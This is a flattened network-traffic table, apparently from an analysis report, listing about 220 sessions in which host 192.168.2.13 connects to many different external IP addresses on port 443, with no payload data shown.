                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16160192.168.2.1359090124.208.212.245443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16161192.168.2.134720686.191.123.142443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16162192.168.2.1342034187.218.28.234443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16163192.168.2.1333730142.204.56.169443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16164192.168.2.1352692111.76.207.217443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16165192.168.2.1334964207.178.82.30443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16166192.168.2.1343794104.170.193.71443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16167192.168.2.1337278158.224.26.192443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16168192.168.2.135829059.230.219.89443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16169192.168.2.134046414.17.129.247443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16170192.168.2.1341146123.117.7.126443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16171192.168.2.13465968.22.197.33443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16172192.168.2.134445244.189.17.193443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16173192.168.2.135164082.235.236.204443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16174192.168.2.133970049.253.118.82443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16175192.168.2.13333164.100.79.195443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16176192.168.2.1360310141.64.146.96443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16177192.168.2.1355428199.155.203.37443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16178192.168.2.134991619.28.84.23443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16179192.168.2.136055257.230.74.221443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16180192.168.2.1353838114.225.230.193443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16181192.168.2.1350024223.35.69.22443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16182192.168.2.1348312188.51.121.226443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16183192.168.2.135720277.202.193.154443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16184192.168.2.1355168167.185.19.105443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16185192.168.2.1343078152.136.96.214443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16186192.168.2.135997840.162.149.251443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16187192.168.2.1348498211.112.104.42443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16188192.168.2.1338900167.76.180.217443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16189192.168.2.1358430108.34.235.135443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16190192.168.2.1349206117.251.76.19443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16191192.168.2.1337144205.25.69.66443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16192192.168.2.134251025.14.14.214443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16193192.168.2.1355536199.156.223.61443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16194192.168.2.1344366118.95.16.45443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16195192.168.2.1351252103.212.32.16443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16196192.168.2.134041612.93.184.99443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16197192.168.2.133592859.11.174.119443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16198192.168.2.1333576128.165.164.227443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16199192.168.2.1348608202.134.112.82443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16200192.168.2.133587857.204.248.136443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16201192.168.2.1341656153.195.185.162443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16202192.168.2.1336310206.6.195.152443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16203192.168.2.1354904137.29.9.90443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16204192.168.2.134278884.135.153.158443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16205192.168.2.13410321.153.39.149443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16206192.168.2.1339060183.142.70.2443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16207192.168.2.13421324.21.57.204443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16208192.168.2.1352106143.242.186.86443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16209192.168.2.134084236.194.81.110443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16210192.168.2.133847094.156.49.18443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16211192.168.2.135148299.129.9.89443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16212192.168.2.134876050.224.67.115443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16213192.168.2.1340196216.127.11.78443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16214192.168.2.13588021.185.151.83443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16215192.168.2.135617447.97.49.112443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16216192.168.2.135875617.126.31.41443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16217192.168.2.1333866176.241.81.253443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16218192.168.2.134259270.135.65.78443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16219192.168.2.134705057.233.162.100443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16220192.168.2.1352860151.87.89.99443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16221192.168.2.135516044.84.163.24443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16222192.168.2.1352470102.15.80.148443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16223192.168.2.1357080196.133.70.33443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16224192.168.2.1335680112.105.173.232443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16225192.168.2.1343772111.74.61.235443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16226192.168.2.1351926146.91.204.253443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16227192.168.2.1346508201.160.9.211443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16228192.168.2.133524244.86.26.200443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16229192.168.2.1352296136.85.149.139443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16230192.168.2.1356240166.16.3.80443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16231192.168.2.133796664.179.220.226443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16232192.168.2.1350778144.54.10.106443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16233192.168.2.1346976206.228.34.202443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16234192.168.2.1358548199.182.80.126443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16235192.168.2.1360142108.21.193.69443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16236192.168.2.134923467.101.15.178443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16237192.168.2.134355671.153.194.88443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16238192.168.2.1341848149.123.160.135443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16239192.168.2.135620058.131.31.242443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16240192.168.2.1350920112.250.201.245443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16241192.168.2.1352202113.149.21.156443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16242192.168.2.1347602210.216.167.221443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16243192.168.2.1353668113.241.218.145443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16244192.168.2.133341237.159.194.43443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16245192.168.2.1348846176.228.56.255443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16246192.168.2.135754287.247.38.160443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16247192.168.2.1348956116.37.220.228443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16248192.168.2.135424669.94.197.177443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16249192.168.2.1346940113.106.236.120443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16250192.168.2.1337210170.49.157.107443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16251192.168.2.1346320176.213.19.253443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16252192.168.2.133597275.84.245.94443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16253192.168.2.1338814174.34.163.44443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16254192.168.2.135399057.216.243.160443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16255192.168.2.1342696207.81.36.90443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16256192.168.2.1350636104.31.16.191443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16257192.168.2.1350024143.119.241.149443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16258192.168.2.1350524122.53.254.38443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16259192.168.2.1341820136.95.228.188443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16260192.168.2.1353880159.199.31.56443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16261192.168.2.1357768115.179.127.123443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16262192.168.2.133319075.151.84.185443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16263192.168.2.133678442.150.165.23443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16264192.168.2.1349458179.84.52.249443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16265192.168.2.1345160104.21.45.105443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16266192.168.2.133602667.200.178.237443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16267192.168.2.1355916210.146.29.168443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16268192.168.2.1340470179.92.196.218443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16269192.168.2.134850819.209.165.68443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16270192.168.2.1334406102.162.157.190443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16271192.168.2.1359176120.147.47.240443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16272192.168.2.135795087.202.198.93443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16273192.168.2.1339552149.81.84.73443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16274192.168.2.134463443.215.19.105443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16275192.168.2.1354530213.218.0.253443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16276192.168.2.1346718198.130.149.201443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16277192.168.2.133670682.111.136.61443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16278192.168.2.134652060.99.139.73443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16279192.168.2.133850219.149.182.196443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16280192.168.2.1335872196.32.163.144443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16281192.168.2.1360058161.60.230.142443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16282192.168.2.135398484.33.207.35443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16283192.168.2.1340320171.164.123.55443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16284192.168.2.1356098164.141.23.42443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16285192.168.2.13386925.27.65.196443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16286192.168.2.1352690123.190.40.100443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16287192.168.2.1344560111.201.239.43443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16288192.168.2.135167274.52.185.219443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16289192.168.2.1348944187.111.59.186443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16290192.168.2.135581638.145.39.78443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16291192.168.2.1359506184.6.74.147443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16292192.168.2.134835690.131.191.202443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16293192.168.2.134800475.42.188.148443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16294192.168.2.1333450173.15.48.32443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16295192.168.2.135368441.7.138.137443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16296192.168.2.1359544126.223.12.32443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16297192.168.2.1353646202.34.110.14443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16298192.168.2.134578820.20.76.73443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16299192.168.2.1341202122.147.118.129443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16300192.168.2.1359164126.130.156.199443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16301192.168.2.134175083.126.85.198443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16302192.168.2.1347944122.199.247.130443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16303192.168.2.133326457.240.27.129443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16304192.168.2.133987862.175.245.113443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16305192.168.2.1334652197.170.109.40443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16306192.168.2.1359078120.123.64.204443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16307192.168.2.1346628156.159.252.202443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16308192.168.2.134146058.80.111.26443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16309192.168.2.135163673.104.228.170443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16310192.168.2.1359706186.4.5.153443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16311192.168.2.1341926179.102.73.138443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16312192.168.2.1334634182.134.176.127443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16313192.168.2.1335436108.7.189.29443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16314192.168.2.1354518101.12.249.28443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16315192.168.2.134552887.183.43.62443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16316192.168.2.133841682.0.231.17443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16317192.168.2.1333180184.76.41.243443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16318192.168.2.134332673.242.233.188443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16319192.168.2.1346472159.99.255.148443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16320192.168.2.1359842201.190.89.148443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16321192.168.2.134556257.5.151.131443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16322192.168.2.133830866.19.219.244443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16323192.168.2.1338732198.34.179.237443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16324192.168.2.135533245.65.206.143443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16325192.168.2.134923418.177.187.107443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16326192.168.2.1334146167.131.67.45443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16327192.168.2.1337456161.16.181.7443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16328192.168.2.1360020223.179.122.254443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16329192.168.2.134976682.188.65.96443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16330192.168.2.13578321.52.135.46443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16331192.168.2.134479819.7.196.120443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16332192.168.2.134440283.254.36.46443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16333192.168.2.1340322218.35.157.55443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16334192.168.2.1350306157.129.43.5443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16335192.168.2.13512921.121.248.95443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16336192.168.2.1335648130.80.11.118443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16337192.168.2.13479628.155.53.134443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16338192.168.2.1356288108.54.184.45443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16339192.168.2.1348022133.203.251.211443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16340192.168.2.134244498.203.21.225443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16341192.168.2.1354596217.201.142.242443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16342192.168.2.134914827.165.91.36443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16343192.168.2.1347852191.131.114.123443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16344192.168.2.133419636.91.246.56443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16345192.168.2.1347456134.201.225.154443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16346192.168.2.1356072212.240.245.72443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16347192.168.2.1338814198.95.75.202443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16348192.168.2.1333972117.86.70.155443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16349192.168.2.135067679.63.123.178443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16350192.168.2.1353648112.10.201.244443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16351192.168.2.1359924179.128.151.191443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16352192.168.2.1349600166.24.215.92443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16353192.168.2.1332812217.48.230.61443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16354192.168.2.135353483.200.19.86443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16355192.168.2.1359732177.177.58.68443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16356192.168.2.135304284.13.7.9443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16357192.168.2.1354250157.192.149.117443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16358192.168.2.135783817.23.99.171443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16359192.168.2.133292443.223.126.161443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16360192.168.2.1346182133.58.41.20443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16361192.168.2.1344110163.49.51.126443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16362192.168.2.134084250.175.41.143443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16363192.168.2.135822241.208.2.88443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16364192.168.2.133785650.8.86.2443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16365192.168.2.1342960108.214.39.41443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16366192.168.2.1360992221.63.92.120443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16367192.168.2.1338428220.57.13.94443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16368192.168.2.1338118108.184.167.249443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16369192.168.2.1345846192.203.61.68443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16370192.168.2.1333210148.93.123.72443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16371192.168.2.134794482.115.85.226443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16372192.168.2.1346390200.126.147.230443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16373192.168.2.1355640206.53.40.46443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16374192.168.2.135063286.15.152.235443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16375192.168.2.1346744199.88.213.68443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16376192.168.2.134927671.243.163.191443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16377192.168.2.1335002161.174.22.95443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16378192.168.2.1355688109.173.154.250443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16379192.168.2.1355746219.107.167.149443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16380192.168.2.1342580177.97.204.237443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16381192.168.2.135459844.104.56.19443
